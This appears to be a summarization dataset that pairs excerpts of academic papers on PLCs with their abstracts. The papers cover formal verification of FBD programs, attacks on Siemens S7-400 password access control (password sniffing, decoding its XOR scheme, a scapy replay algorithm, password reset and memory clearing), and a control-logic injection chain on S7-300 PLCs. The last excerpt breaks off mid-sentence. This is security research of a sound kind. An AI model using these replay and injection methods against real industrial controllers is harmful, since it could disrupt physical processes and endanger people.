result2;IL textFBD Figure 6. Example: IL and textFBD formats of an FBD program A. Constructing the textFBD format This is the rst step in verifying an FBD program. The textFBD representation is generated from the IL representa- tion of the program. IL is a machine-oriented PLC program- ming language, and each FBD program can be represented in IL. The range of textFBD statements is equivalent to that of FBD statements (cf. [12]). The IL format of an FBD program can be transformed to textFBD using a context-free grammar. An excerpt of it is shown in table IV. In the table, transformation rules are shown as they are used for transforming the network in gure 3. The IL format of the network is shown in gure 6. The example network may be considered as a complex statement consisting of a logical bit operation followed by two assignments (cf. rule (1) in table IV). A logical bit operation always has an output. Since no dangling lines may exist in a network, this output must be consumed in some way. In our case, the logical bit operation ends with assignments (cf. rule (7)). To enable using two such assignments, rules (8) and (9) are needed. Among the logical bit operations, we have a comparison of two integers (rule (6)). If the result of this operation is to be combined with the AND of two further Boolean variables, rst rule (3) and then rule (4) must be applied. An AND operation of two Boolean variables can be recognized using rules (2) and (4). Rule (5) describes how two logical bit operations can be combined with an ORoperation. The circuit variables in the textFBD le ( Livariables)are generated when connections between two operands are to be represented (cf. g. 6). Such a variable is generated when the recognition of an FBD operand is terminated. In our example, this means the following. As soon as the comparison is recognized, L1is generated. Then the recognition of the AND operation follows (until the ORoperation is read), with the subsequent generation of L2. In order to execute the ORoperation, the subsequent AND operation ( L3) is needed. Only thenL4is generated as a disjunction of L2and L3. Finally, the result of the logical bit operation in variable L4is assigned to the variables result1 andresult2 . On the basis of the grammar and the circuit variable concept, textFBD les are generated. B. Constructing the tFBD format Although the textFBD format of the FBD program can be transformed to NuSMV directly, we rst minimize the model in order to minimize the NuSMV state space. As shown in section III, we may do away with many circuit variables and thus reduce the model size. This substitution is expressed in the tFBD format of the FBD program. For constructing the tFBD format, only the list of FBD operations is needed which use local circuit variables. When transforming a textFBD le, each statement is checked whether it uses an operator from the list. If yes, it is copied into the tFBD le without change. Otherwise, we rst substitute the circuit variable (cf. g. 2). C. Constructing the NuSMV model Transforming a tFBD le to the NuSMV input language has been treated above in subsection III-C. We have shown how to represent tFBD statements by NuSMV transfor- mation rules. In order to complete a NuSMV model, the variable declarations have to be added (cf. g. 2). VI. C ONCLUSION In this paper, we present a method for the automated formal veri cation of PLC software. In particular, we look at FBD software. In order to verify the software, we propose to represent the graphical SPS programming language textually in two observationally equivalent ways: textFBD and tFBD. From the latter format, we derive a NuSMV model. Its state space is dramatically smaller than that of a NuSMV model directly derived from textFBD, so that applications of practical size can be model checked. The method was put to the test in the area of railway automation. In a case study, a component of an interlocking software, the logic controlling a point, was veri ed. The de- sign of the model as well as the construction of the NuSMV model were automated. With this successful project, we 447 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. are con dent to pave the way for applying the method in practice. There are two important aspects in applying formal ver- i cation in practice: 1) the method should be applicable to relatively big and realistic models; 2) the execution times should be acceptable. The 1st point is satis ed by our method because the case study is directly taken from practice, without any omissions or abstractions which would make it more academic . As for the 2nd point, the execution times for setting up and transforming the model and veri- fying the speci cations are acceptable. It is true that they are greater than what simulations would take. But there is a fundamental difference between simulation and veri cation where the entire state space is being explored. Our realistic case study is an important step to convince not only railway engineers that automated formal methods are practical. The next step in applying our methods should be a state-based speci cation. This way, the advantage of our method would become even more evident.
Summary:
The development of Programmable Logic Con- trollers (PLCs) in the last years has made it possible to apply them in ever more complex tasks. Many systems based on these controllers are safety-critical, the certi cation of which entails a great effort. Therefore, there is a big demand for tools for analyzing and verifying PLC applications. Among the PLC- speci c languages proposed in the standard IEC 61131-3, FBD (Function Block Diagram) is a graphical one widely used in rail automation. In this paper, a process of verifying FBDs by the NuSMV model checker is described. It consists of three transformation steps: FBD !TextFBD!tFBD!NuSMV . the novel step introduced here is the second one: it reduces the state space dramatically so that realistic application components can be veri ed. The process has been developed and tested in the area of rail automation, in particular interlocking systems. As a part of the interlocking software, a typical point logic has been used as a test case.
|
Summarize:
Keywords-PLC; SCADA; Industrial Control Systems; Access Control; Passwords; I. I NTRODUCTION A Programmable Logic Controller (PLC) is an important component in an ICS system. It is a control device used to automate industrial processes via collecting input data from eld devices such as sensors, processing it, then send commands to actuators devices such as motors. Being a pivotal device in ICS systems, PLCs are preferred target for cyber security attacks. ICS-CERT, the repository for ICS speci c incidents, includes a large number of PLC related issues. A quick search performed in November 2016 reveals that out of a total of 589 advisories, 89 target directly PLCs and out of a total of 114 alerts, 17 involve PLCs. Another manifestation of the exposure of PLCs to cyber security attacks is the Stuxnet malware [1] which is designed to attack primarly PLCs of the Iranian nuclear facility. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. PLC Access Control can be implemented at different layers: network layer, physical access, rmware, etc. In this paper, we discuss the different access control models for PLCs, but we focus on the most commonly deployed access control mechanism, namely,password-based access control. Using recent PLC devices (2016) with updated rmware, we show how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a conse- quence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. II. PLC V ULNERABILITIES A PLC is a particular type of embedded devices that is programmed to manage and control physical components (motors, valves, sensors, etc.) based on system inputs and requirements. A PLC typically has three main components, namely, an embedded operating system, control system soft- ware, and analog and digital inputs/outputs. Hence, a PLC can be considered as a special digital computer executing speci c instructions that collect data from input devices (e.g. sensors), sending commands to output devices (e.g. valves), and transmitting data to a central operations center. PLCs are commonly found in supervisory control and data acquisition (SCADA) systems as eld devices. Because they contain a programmable memory, PLCs allows a cus- tomizable control of physical components through a user- programmable interface. The ICS-CERT repository, dedicated to ICS related se- curity incidents, includes several reports involving PLC vulnerabilities and alerts. Most of the reports are relatively recent (2010 and later). The increase in ICS and PLC incidents coincides with the increasing interconnection of ICS and corporate networks which became a necessity to improve ef ciency, minimize costs, and maximize pro ts. This, however, exposes ICS systems, and PLCs in particular, to various types of exploitation. Most of PLC vulnerabilities can be grouped into three categories, namely, network vulnerabilities, rmware vulner- abilities, and access control vulnerabilities. PLCs are increasingly required to be interconnected with corporate LANs, Intranets, and Internet. Due to their increas- ing connectivity, PLCs are expected to support mainstream network protocols. Such standard protocols (e.g. TCP, IP, ARP, etc.) facilitate interconnection, but bring their own vul- nerabilities (e.g. Spoo ng, Replay, MITM, etc.). However, World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 56 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table I EXAMPLES OF PLC NETWORK VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-11-223-01A Siemens SIMATIC PLCs Use of Open Communication Protocol Execute unauthorized commands ICSA-15-246-02 Shneider Modicon PLC Web Server Remote le inclusion Remote le execution ICSA-12-283-01 Siemens S7-1200 Web Application Cross-site Scripting Run malicious javascript on Engineer- ing station browser ICSA-15-274-01 Omron PLCs Clear text transmission of sensitive informationPassword snif ng ICS-ALERT-15-224-02 Schneider Electric Modicon M340 PLC StationLocal le inclusion Directory traversal/ le manipulation the most common type of network vulnerabilities is related to ICS speci c network protocols such as Modbus, pro net, DNP3, etc. which include lack of authentication, lack of integrity checking of data sent over the protocol. Table I lists a sample set of PLC network vulnerabilities as reported in ICS-CERT repository. Firmware is the operating system of controller devices, in particular, PLCs. It consists in data and code bundled together with several features such as OS kernel and le system. As any software, a rmware is prone to aws and security vulnerabilities. Vulnerabilities include buffer over ow, improper input validation, awed protocol imple- mentation, etc. More importantly, rmware and patches must be certi ed by vendors to make sure that they will not break system functionalities. Unfortunately, a large number of PLC vendors use weak rmware update validation mechanisms allowing unauthenticated rmware updates [2]. Table II lists a sample set of PLC rmware vulnerabilities as reported in ICS-CERT repository. A PLC is a sensitive component of ICS systems and hence only authorized entities should be allowed to access it and any such access should be appropriately authenticated. The most common PLC access control vulnerabilities include poor authentication mechanism, lack of integrity methods, awed password protection, and awed communication pro- tocols. For example, PLC vendors use hidden or hard coded usernames and passwords to fully control the device. Attack- ers setup a database of default usernames and passwords and can brute-force such devices. Once unauthorized access is performed, an adversary can retrieve sensitive data, modify values, manipulate memory, gain privilege, change PLC logic, etc. III. PLC A CCESS CONTROL A. Physical access control Proper deployment and access control of PLC as well as other ICS controllers mitigate signi cantly security breaches either from internal or external adversaries. Access control vulnerabilities can be signi cantly reduced by implement- ing recommendations in established standards such as the ANSI/ISA-99 [3]. It is a complete security life-cycle pro- gram that de ne procedures for developing and deployingpolicy and technology solutions to implement secure ICS systems. ISA99 is based on two main concepts, namely, zones and conduits, whose goal is to separate various subsystems and components. Devices that share common security requirements have to be in the same logical or physical group and the communication between them take place through conduits. This way, network traf c con den- tiality and integrity is protected, DoS attacks are prevented and malware traf c is ltered. In addition, control system administration must restrict physical and logical access to ICS devices to only those authorized individuals expected to be in direct contact with system equipments. B. Network access control ICS network access control is typically implemented in layers. The rst layer is network logical segmentation achieved typically with security technologies such as re- walls and VPNs. All controller devices, in particular PLCs, must be located behind rewalls and not connected directly to corporate or other networks. Most importantly, critical devices should not be exposed directly to Internet. Remote access to all ICS devices should be through secure tunnels such as VPNs. It is important to note that rewall and VPN technologies used in ICS systems are different from main- stream rewall and VPN used in typical IT networks. Indeed, many vendors many vendors provide special appliances for securing ICS networks. For example, Siemens provides a special type of switch, namely, Scalance S, with rewall and VPN features to secure the communication from/to PLCs. Finally, even with full deployment, these technologies may not block all breaches due to weak or inadequate con gurations and ltering rules. C. Password access control Password based access control is by far the most com- monly used type of access control. Most PLC devices have built-in password protection to prevent unauthorized access and tampering. For effective password access control, important requirements need to be satis ed. In particular, password protection: must be enabled whenever possible must be properly con gured World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 57 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Table II EXAMPLES OF PLC FIRMWARE VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES Advisory Affected product Vulnerability Exploit ICSA-16-026-02 Rockwell MicroLogix 1100 PLC Stack-based buffer over ow Remote execution of arbitrary code ICSA-13-116-01 Galil RIO-47100 PLC Improper input validation (allowing repeated requests to be sent in a single session)Denial of Service ICSA-14-086-01 Shneider Modbus Serial Driver Stack-based buffer over ow Arbitrary code execution with user privilege ICSA-12-271-02 Optimalog Optima PLC Improper handling of incomplete packets Denial of Service ICSA-16-152-01 Moxa UC 7408-LX-Plus Device Non-recoverable rmware overwrite Permanently harming the device Figure 1. PLC Lab Setup must use strong encoding scheme must not need high processing operations must not use hardcoded credentials must be frequently and periodically changed. In addition, it is highly recommended to delete default accounts or change default passwords. Unfortunately, not all vendors comply with and enforce these principles, therefore several password related incidents are reported. IV. S ECURITY ANALYSIS OF PLC PASSWORD ACCESS CONTROL To carry out a realistic security analysis of PLC access control, we selected a commonly used PLC model, namely, Siemens S7-400, and setup a lab including common ICS con guration (Fig. 1). Based on S7-400 documentation, several test cases have been performed which revealed three access control levels for the PLC, namely, no protection, write-protection and read/write-protection. The rst level of access control, which is the default level, does not provide any form of access control. Using this level, any entity (device, station, etc.) can access the PLC processes and data without restriction. Access is possible provided that the remote entity speaks a PLC supported communication protocol (e.g. COTP, Mod- bus, Pro net). The second level, write-protection, provides as its name indicates a write protection on PLC data and processes. That is, any attempt to modify data or processes on the PLC (e.g. Load new program, clear data) is password authenticated. The third level, which is the most restrictive, is read/write-protection. Using that level, any interaction, that is, read from or write to the PLC is password authenti- cated. A. Password policy The con guration software, namely, SIMATIC PCS7 ac- cepts any 8 ASCII characters password. If the password is less than 8 characters long, PCS7 pads it with white spaces. To set a PLC password, a user has to change the protection level and set the password in the PCS7 hardware con guration tool before loading the changes to the PLC. In addition to being loaded to the PLC memory, the password is stored locally in the engineering station s local les. In a normal scenario any command sent to the PLC (e.g. start, stop, clear memory) should be authorized by providing the password. However, since the password is stored locally in the engineering station, PCS7 software will ask for the password only one time after the new con guration is loaded to the PLC. In subsequent interactions, PCS7 will include automatically the password in the packet requests sent to the PLC. B. PLC memory structure As mentioned above, setting a password consists in chang- ing the protection level, selecting a password and then loading the new con guration to the PLC memory. The latter is organized into labeled blocks. Each block holds a speci c type of information (Fig. 2). Most of PLC blocks are used to organized the PLC program into independent sections corresponding to individual tasks. Function Block (FB) is a block that holds user-de ned functions with memory to store associated data. Functions (FC) is used to keep frequently used routines in the PLC operations. Data Block (DB) stores user data. Organization Block (OB) is an interface between operating system and user program, used to determine the CPU behavior, for example, de ne error handling. System World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 58 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. Function Block (SFB) and System Functions (SFC) hold low level functions (libraries) that can be called by user programs such as handling the clock and run-time meters. Therefore, information loaded to the PLC is divided into blocks as well. The password is communicated and stored in the System Data Block (SDB). SDB itself is divided into sub-blocks with different roles. The sub-blocks numbered from 0000 to 0999 and from 2000 to 2002 hold data that is updated in each download process. The rest of the sub- blocks are divided into two sets: sub-blocks from 1000 to 1005 should contain data and sub-blocks from 1006 to 1011 should contain con guration data. Loading a new program to the PLC yields to ovewriting all sub-blocks of the SDB block, except the 0000 sub-block which contains the password. If an adversary aims at updating the password, he needs to clear the 0000 block rst with a dedicated command and then set a new password with another command. OB FB FC DB SDB SFC SFB Other Data0000 0001 0093 00220003 0007 0004 0002 0026 0092 0091 0090 0122 0126 0999 2001 2002 1006 1007 1008 1009 1010 10111000 1001 1002 1004 10052000 1003System Data BlocksPLC memory block types Figure 2. S7-400 PLC memory structure C. PLC password snif ng In order to evaluate the security of the password-based access control, a rst step is to sniff the network packets containing the password. Typical network snif ng software is used to capture packets exchanged between the engi- neering station (PCS7) and the PLC during a password setting process (e.g. Wireshark, tcpdump). Since password setting is achieved through load con guration command sent to the PLC, the process is repeated several times with different passwords to collect a good number of samples. The captured traf c is rst ltered to extract complete TCP streams. The streams are then compared using byte compar- ison tools (e.g. Burp Suite Comparator). These tools help nding similarities and differences between TCP streams. This allowed to identify the speci c packets containing the password and the exact bytes shift for the passwordlocation inside the packets. It turned out that the 8 characters password is encoded in each packet. Hence con guration software in the engineering station uses an encoding scheme to encode the password before uploading it to the PLC. It is important to note that when the PLC is con g- ured with no-protection level, sniffed packets during load con guration have the same size as with the other levels of protection (read protection and read/write protection). Hence, packets are padded with random bits in place of the password in case of no-protection level. D. Reverse engineering password encoding scheme After locating the 8 bytes inside the network packets con- taining the password, the next step is to decode the bytes to retrieve the plain-text version of the password. The reverse- engineering started by trying typical encoding schemes, namely, URL encoding, ASCII Hex, Base64, variants of Xor (single-byte, multiple-byte, rolling, etc.). However, none of these typical schemes retrieved the plain text version of the password, pre-set in our samples. Full- edged cryptographic (DES, AES, RC4, etc.) as well as hashing (MD5, SHA512, etc.) functions are excluded in the investigation because of three reasons. First, there is no key exchange stage involved before password communication1. Second, if cryptographic and hashing functions were used, the encoded password bytes would be completely shuf ed compared to the plain text version, which is not the case here (the cipher text is encoded byte by byte). Third, cryptographic and hashing functions are too processing intensive for PLCs. Figure 3. PLC Password Encoding Xor is a very common encoding scheme that is suitable for resource limited hardware devices. As mentioned above, 1This holds for cryptographic functions. World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 59 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. the password encoding is not using typical Xor (single- byte, multiple-byte, etc.). Taking into consideration the fact that the encoding is done byte-by-byte and the requirement of a lightweight encoding algorithm, we focused on trying customized Xor transformations. To this end, a represen- tative list of (plain-text password, encoded-text password) pairs have been sampled from the network. Then, using automated scripts to brute-force each byte, we could suc- cessfully reverse-engineer the Xor based encoding scheme. A graphical representation of the nested Xor based encoding scheme is shown in Fig. 3. It is important to note that the PLC is using two variants of the encoding scheme: one used to load a con guration to the PLC and the other is used during the authentication process. Both variants differ by the staic byte constant used: 0x55 and 0xAA . V. PLC A CCESS CONTROL ATTACKS As a consequence of compromising the password based PLC access control, several concrete attacks can be carried out on the PLC ranging from simple replay to unauthorized password update attacks. A. Replay attack A replay attack on the PLC consists in recording a sequence of packets related to a certain legitimate command and then replaying it later without authorization. The attack consists of 3 steps: starting a given command (stop, start, load con guration, clear memory block, etc.), capturing the packets, and replaying the captured packets at a later time. The target PLC may or may not be password protected. are accepted by the TCP/IP kernel at the PLC, We resorted to write a customized python script using scapy [4]. Scapy is a powerful packet manipulation program written in python and hence can be easily used in python scripts. It features a variety of packet manipulation capabilities including: sniff- ing and replaying packets in the network, network scanning, tracerouting, etc. However, the most useful scapy features for our replay attack are the ability to rewrite the sequence and acknowledgement numbers and to match requests and replies. Algorithm 1 shows the core of the python script using the scapy features. The above python program has been tested using two attack scenarios. In the rst scenario, the replay attack was launched from the same host (IP address) used for the capture, that is, the engineering station with the con gura- tion software. In the second scenario, the replay attack was launched from a different host on the same network, that is, the attacker machine with Kali. In each scenario, two types of commands are tried, namely, start and stop which require password authentication. The replay attack was successful in both scenarios for both types of commands. Hence, an unknown attacker machine (without appropriate con gu- ration software) on the same network, can turn the PLC ON or OFF by simply replaying a start or stop commandAlgorithm 1 Replay a sequence of captured packets using Scapy 1:function REPLAY (pcap le, eth interface, srcIP, srcPort) 2: recvSeqNum 0 3: SYN True 4: forpacket in rdpcap(pcap le) do 5: ip packet[IP] 6: tcp packet[TCP] 7: del ip.chksum .Clearing the checksums 8: ip.src srcIP .Attacker s machine IP 9: ip.sport srcPort .Attacker s machine Port 10: iftcp. ags == ACK or tcp. ags == RSTACK then 11: tcp.ack recvSeqNum+1 12: ifSYN or tcp. ags == RSTACK then 13: sendp(packet, iface=eth interface) 14: SYN False 15: continue 16: end if 17: end if 18: rcv srp1(packet, iface=eth interface) 19: recvSeqNum rcv[TCP].seq 20: end for 21:end function without knowing the PLC password. This clearly might cause signi cant damage to a SCADA system. 1) Password stealing: As detailed Section IV, packets between the engineering station and the PLC are sent in clear including the encoded passwords. Based on a representative set of samples, we could locate the password inside packets and reverse-engineer the password encoding scheme. This allowed us to retrieve the plain-text password from the network traf c between the engineering station and the PLC. 2) Unauthorized password setting and updating: In a legitimate scenario, the PLC password is set and updated from the con guration software in the engineering station. In case of password update, the old password should be supplied rst. Due to the PLC access control vulnerability, an attacker can set and update the password by replaying malicious packets directly to the PLC. When a password is written on the PLC, the SDB (System Data Block) is overwritten. The load process rst checks the SDB to see if it s clean or has a con guration already. If there is a con guration, the process checks if a password is set or not. Hence, there are two main cases: setting a con guration with a password for the rst time and updating an old con guration that has already a password. For the rst case, setting a password for the rst time requires to record a password setting packets sequence used in an old session and then replaying them. Since the goal is mainly to set the password, only packets in charge of overwriting block 0000 in the SDB, which contain the password, are kept (More details in Section IV-B). For the second case, the goal of the attack is to set a password while the PLC is already protected by an existing password. Using the same procedure as the rst case as-is did not work. After investigation it turned out that the block 0000 of the SDB holding the password cannot be overwritten by replaying packets. As a result, the PLC keeps sending a World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE 60 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:13 UTC from IEEE Xplore. Restrictions apply. FIN packet whenever an attempt is made to overwrite the SDB. To overcome this problem, we resorted to a two-stage procedure where initially we clear the content of 0000 block and then we replayed packets to overwrite only that block with a new password. Since there is no legal command to just clean 0000 block, we looked for a sequence of packets to delete a different block and we modi ed them to delete 0000 block. With this two-stage procedure, the password is successfully updated by a different workstation without the con guration software and without knowing the old password. 3) Clear PLC memory: The rst stage of the unautho- rized password updating attack consists in clearing the 0000 block of the SDB without a need for the password. This step can be generalized to clear other blocks. More importantly, in an extreme use case, all PLC memory blocks can be cleared. With this vulnerability, an attacker can launch a DoS attack by clearning all PLC memory and turning the PLC into unresponsive device. VI. R ELATED WORK Very close to our work, in a BlackHat talk, Beresford demonstrated a number of vulnerabilities in Siemens Simatic PCS7 software including replay attacks, authentication by- pass, ngerprinting and remote exploitation using Metasploit framework [5]. This paper deviates from Beresford s demon- strations since our attacks are more interactive and use the recent and more secure versions of the PCS7 software as well as the more uptodate rmware of Siemens PLC S7- 400. As a generalization of Beresford s attacks, Milinkovic and Lazic reviewed a set of commercial Operating Systems running on PLCs of major vendors, highlighting serious vul- nerabilities with some experiments of few attacks conducted on ControlLogix PLC [6]. Also close to our work, Sandaruwan et al. showed how to attack Siemens S7 PLCs by exploiting aws in the ISO- TSAP (Transport Service Access Point) protocol used for data exchange between controllers and PLCs [7]. A signi cant body of work in the literature focuses on security solutions for ICS systems which yield several coun- termeasures to reinforce the security of such systems. These can be classi ed into communication protocols improve- ment [8], [9], and rewalls, ltering methods, DMZs [10], [6], [7]. However, unlike typical IT systems, it is impractical and cost-effective to embrace several layers of mitigations due to performance and availability considerations. VII. C ONCLUSION PLCs are preferred target for cyber security attacks. PLC security issues range from simple DoS to sophisti- cated remote code execution vulnerabilities. Most of PLC attacks are possible because attackers could have access and compromise the PLC device. In this paper, we carried out a security analysis of the most common PLC accesscontrol mechanism, namely, password-based access control. Using recent PLC devices (2016) with updated rmware, we showed how passwords are stored in PLC memory, how passwords can be intercepted in the network, how they can be cracked, etc. As a consequence of these vulnerabilities, we could carry out advanced attacks on ICS system setup, such as replay, PLC memory corruption, etc. Although mitigating such vulnerabilities is relatively easy by placing a security module (e.g. Scalance S) between the PLC and other devices, such approach is not yet widely deployed for budget and practical considerations. ACKNOWLEDGMENT This research was supported by The National Science, Technology and Innovation Plan (NSTIP) grant, NSTIP 13-INF281-04 at King Fahd University of Petroleum and Minerals.
Summary:
A Programmable Logic Controller (PLC) is a very common industrial control system device used to control output devices based on data received (and processed) from input devices. Given the central role that PLCs play in deployed industrial control systems, it has been a preferred target of ICS attackers. A quick search in the ICS-CERT repository reveals that out of a total of 589 advisories, more than 80 target PLCs. Stuxnet attack, considered the most famous reported incident on ICS, targeted mainly PLCs. Most of the PLC reported incidents are rooted in the fact that the PLC being accessed in an unauthorized way. In this paper, we investigate the PLC access control problem. We discuss several access control models but we focus mainly on the commonly adopted password-based access control. We show how such password- based mechanism can be compromised in a realistic scenario as well as the list the attacks that can be derived as a consequence. This paper details a set of vulnerabilities targeting recent versions of PLCs (2016) which have not been reported in the literature.
|
Summarize:
Index Terms Programmable Logic Controllers (PLCs), Con- trol Injection Attack, Decompiler, Compiler, Ladder Diagram; I. I NTRODUCTION Industrial Control Systems (ICSs) are used to automate criti- cal control processes such as production lines, electrical power grids, gas plants and others. They consist of Programmable Logic Controllers (PLCs) which are directly connected to the physical processes. They are equipped with control logic that de nes how to monitor and control the behavior of the processes. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Schneider, etc. Each vendor has its own proprietary rmware, programming, communication protocols and maintenance soft- ware. However, the basic hardware and software architecture is similar, meaning that all PLCs contain variables, and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor s control logic language. The control logic is then compiled into an executable format, anddownloaded to the PLC. Unfortunately, the security features are largely absent in ICS components or ignored/disabled because security is often at odds with operations. Therefore, thousands of PLCs are directly reachable from the internet. Although only one PLC may be reachable from outside, this exposed PLC is likely to be connected to internal networks e.g. via PROFINET with many more PLCs [1]. This is what is called the deep industrial network, therefore attackers can leverage an exposed PLC to extend their access from the internet to the deep industrial network. Stuxnet [2] is perhaps the most well-known attack on ICSs. This malware used a windows PC to target Siemens S7-300 PLCs that are speci cally connected with variable frequency drives. It infects the control logic of the PLCs to monitor the frequency of the attached motors, and only launches an attack if the frequency is within a certain normal range (i.e. 807 Hz and 1,210 Hz). Another attacks on PLCs have been already conducted in the last decade. Most of them aimed at modifying the control logic in its compiled version e.g. MC7 bytecode for Siemens and RX630 bytecode for Schneider. In contrast, our attack manipulates the control logic program in its high-level format, precisely in its LAD format. We choose LAD over the other programming languages because LAD is a graphical language where each instruction is represented as a graphical symbol and the instructions are grouped into networks which makes reading and understanding the control logic program in LAD format very easy even for non-experts. We also focus in this paper, as a part of our full attack-chain, on the capability of employing 1) a decompiler to obtain the LAD code from the stolen machine bytecode over the network, and 2) a compiler to recompile the infected LAD code into MC7 machine bytecode that the PLC can read. We evaluate the accuracy of our decompiler and compiler on 5 different control logic programs (chosen randomly). Finally, we performed our full attack on a real industrial example application based on S7 300 PLCs and TIA Portal software (see gure 1). Please note that compromising the ICS network is out of the scope of this work and can be achieved via typical attack vectors in our IT world such as infected USB, vulnerable web server, etc. Our attack scenario is network based, and can be successfully launched by any attacker with a network access to the target PLC. However, nding PLCs connected directly to the Internet is an easy task using search engines such as Shodan, Censys, etc.IECON 2021 - 47th Annual Conference of the IEEE Industrial Electronics Society | 978-1-6654-3554-3/21/$31.00 2021 IEEE | DOI: 10.1109/IECON48115.2021.9589721 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. Fig. 1: Example application of our control process The rest of the paper is organized as follows. Section II discusses related work, while our experimental setup is presented in section III. We illustrate our attack scenario in IV , and evaluate our decompiler and compiler in V , and section VI concludes this paper. II. R ELATED WORK In the recent years, many vulnerabilities aimed at modifying control logic source code, by exploiting the engineering station [3], or by leveraging Ethernet design aw and then using crafted packets to delete control logic programs [4], [5]. Other vulnerabilities modify the control logic at runtime, compro- mising rmware and authentication aws, and triggering PLC fault states to overwrite the control logic [6], [7]. However, as real scenario attacks targeted ICSs, we can mention the ones that occurred in Ukraine [8], [9], and in Germany [10]. These attacks caused severe control distributions in the target facilities and a massive damage in the physical systems controlled by the PLCs attacked. In the following, we compare our approach to previous published efforts that focused on exploiting the control logic code of PLCs. In 2018, A Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [11]. Such malware is inserted by an attacker into existing control logic on PLCs. Anyway, this scenario requires from the adversary to be familiar with the programming languages that the PLC is programmed with beforehand, which is not a common case for a real scenario. Another group of re- searchers presented a remote attack on the control logic of PLCs in [12]. They were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on Schneider Electric Modicon M221 PLCs, and its vendor-supplied engineering software (SoMachine-Basic). In opposite to their work, ourattack allows the attacker to modify the control logic program in its high-level format, and on the wish of the attacker. Furthermore, we use S7 PLCs provided by Siemens which transfer the machine bytecode over S7 packets. At black Hat USA 2015 Klick et al. [13] demonstrated injection of malware into the control logic of a Simatic S7-300 PLC, without disrupting the service. The modi cation process of their attack is also done on the machine bytecode level. In a follow on work, Spenneberg et al [14] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new targets (PLCs). The authors hided the infected code in an organization block (OB9999) and then transferred from a PLC to another using their worm. Their attack manipulates the control logic of S7 PLCs successfully, but it is written with constraints such as the maximum cycle on one hand, and on other hand did not decompile the machine bytecode which required that the attacker has a TIA Portal installed on his machine. In 2021, we, in a former work, presented a stealthy injection attack on the control logic of S7 PLCs [15]. Our attack introduced a malicious logic in a target PLC. As a part of our attack scenario, we implemented an initial decompiler that takes the machine bytecode as an input and decompiles it into Statement List (STL) source code. Our decompiler used in [15] was very limited to only a few instructions, and utilized a small database that consists of 56 entries. In this work, we develop our mapping database to involve 3802 entries, 34 LAD instructions including inputs, outputs, function blocks, data blocks, organization blocks, timers, counters, etc. Moreover, our new approach allows an adversary to modify the control logic in its high-level code i.e. LAD format, and recompiles the infected code to its machine code again, using a compiler before pushing it back to the target PLC. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. Fig. 2: High-level overview of our proposed attack scenario III. EXPERIMENTAL SET-UP In this section, we describe our experimental set-up used to test our full-chain attack presented in this paper. As shown in gure 1 (please note that we also used this setup in experiments run in our earlier publications [15], [16], [20]), there are two aquariums lled with water that is pumped from one to the other until a certain level is reached and then the pumping direction is inverted. The control process in this set-up is cyclically running as follows: PLC.1 (S7 315- 2DP) reads the input signals coming from the sensors 1, 2, 3 and 4. The two upper sensors (Num. 1, 3) installed on both aquariums are reporting to PLC.1 when the aquariums are full. While the two lower sensors (Num. 2, 4) are reporting to PLC.1 when the aquariums are empty. After that, PLC.1 sends the sensors readings to PLC.2 (S7 315-2 PN/DP) using an industrial Ethernet Communication Processor (IE-CP 343- 1 Lean). Then PLC.2 powers the pumps on/off depending on the sensors readings received from PLC.1. IV. A TTACK DESCRIPTION In this Paper, we present a full attack-chain on the control logic of an S7 PLC. We assume a realistic attack scenario where the TIA Portal software in the engineering station is not reachable for an attacker, thereby making our attack more challenging. After the attacker penetrated the system network, and can send/receive messages to/from a target PLC,he launches our MITM system presented in [15] between the engineering station (TIA Portal software) and the eld side (S7 PLCs), so he is able to listen and record all the network traf c exchanged between the stations using Wireshark software. Figure 2 shows a high-level overview of our proposed control injection attack. It consists of six main phases: 1- Compromising the PLC security measures. In this work we skip this step as it is already achieved and illustrated in details in our former papers [15], [16], and focus only on the following phases. 2- Stealing the compiled machine bytecode program from the target PLC. 3- Decompiling the bytecode representation of the stolen control logic into its high-level source code (LAD code). 4- Modifying the control logic in its decompiled format by replacing/removing/adding entries from/to the original code. 5- Recompiling the infected code into its low-level repre- sentation (that can run on the PLC). 6- Pushing the infected machine bytecode back to the PLC. A. Extractor - Stealing the Machine Bytecode from the PLC 1) Identify S7Comm requests: As the PLC only sends/receives the control logic program by processing either upload or download request that sent from the engineering station, our extractor rst determines all S7Comm packets Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. Fig. 3: Identify an S7 request s functionality exchanged 